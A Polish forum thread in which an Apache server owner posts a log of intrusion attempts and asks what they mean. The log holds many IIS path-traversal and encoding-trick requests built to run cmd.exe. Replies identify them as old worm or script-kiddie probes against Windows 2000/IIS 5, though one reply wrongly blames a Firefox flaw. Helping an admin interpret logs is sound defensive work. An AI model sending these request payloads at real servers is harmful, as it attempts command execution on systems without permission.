Web server

[douglasmclloyd]

Codziennie jakieś dziady próbują mi się włamać do servera. Ostatnio w logu znalazłem coś takiego. Czy ktoś wie co te ku... próbują zrobić?

A total of 1 sites probed the server
24.12.183.239

Requests with error response codes
400 Bad Request
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
404 Not Found
/MSADC/root.exe?/c+dir: 1 Time(s)
/_mem_bin/..%255c../..%255c../..%255c../wi ... /cmd.exe?/c+dir: 1 Time(s)
/_vti_bin/..%255c../..%255c../..%255c../wi ... /cmd.exe?/c+dir: 1 Time(s)
/c/winnt/system32/cmd.exe?/c+dir: 1 Time(s)
/d/winnt/system32/cmd.exe?/c+dir: 1 Time(s)
/favicon.ico: 3 Time(s)
/msadc/..%255c../..%255c../..%255c/..%c1%1 ... /cmd.exe?/c+dir: 1 Time(s)
/robots.txt: 61 Time(s)
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
/scripts/root.exe?/c+dir: 1 Time(s)
/tmp: 1 Time(s)

[ZipoKing]

A jaki to serwer? Apache, M$ IIS ?
Po mojemu to jakiś dzieciak naczytał się jak zostać hAx0rem i teraz się bawi, (przy bliższym poznaniu wygląda to na próbę wykorzstania luki w FireFoksie<=2.0.0.5

[darthbishop]

2007-07-27 18:38:20 douglasmclloyd napisał:

> Codziennie jakieś dziady próbują mi się włamać do servera. Ostatnio w logu znalazłem coś
 > takiego. Czy ktoś wie co te ku... próbują zrobić?
 >
 > A total of 1 sites probed the server
 > 24.12.183.239
 >
 > Requests with error response codes
 > 400 Bad Request
 > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > 404 Not Found
 > /MSADC/root.exe?/c+dir: 1 Time(s)
 > /_mem_bin/..%255c../..%255c../..%255c../wi ... /cmd.exe?/c+dir: 1 Time(s)
 > /_vti_bin/..%255c../..%255c../..%255c../wi ... /cmd.exe?/c+dir: 1 Time(s)
 > /c/winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > /d/winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > /favicon.ico: 3 Time(s)
 > /msadc/..%255c../..%255c../..%255c/..%c1%1 ... /cmd.exe?/c+dir: 1 Time(s)
 > /robots.txt: 61 Time(s)
 > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir: 1 Time(s)
 > /scripts/root.exe?/c+dir: 1 Time(s)
 > /tmp: 1 Time(s)


Sądząc po częstych próbach odpalenia cmd.exe podejrzewam, że to jakiś idiota próbuje się włamać do ciebie myśląc, że masz winde i IIS. To pewnie jakiś scriptkid.

[TheUsh]

Ten log wyglada jak po dzialaniu jakiegos prostego exploita, ktory pisany byl z mysla o Windows 2000 i IIS5.0. Takie cos po prostu nalezy olac, jakis dzieciak sie bawil, bo myslal ze dzieki temu bedzie wielkim "hakerem"

[douglasmclloyd]

2007-07-27 18:48:52 ZipoKing napisał:

> A jaki to serwer? Apache, M$ IIS ?

Apache

[Arkadiusz Bednarczyk]

Takie ślady zostawiają przeważnie różne robaki i zawirusowane komputery, generalnie nie przejmowałbym się tym zbytnio

Miałem okazję przeinstalowaywać takiego Win(co ciekawe na Linuxa:D).
To się pierwszy raz pojawiło z w2k bez SP. Stara sprawa. Sztuczka sprytna(miałem okazję prześledzić).
Dziurawy ten IIS :/

Mariusz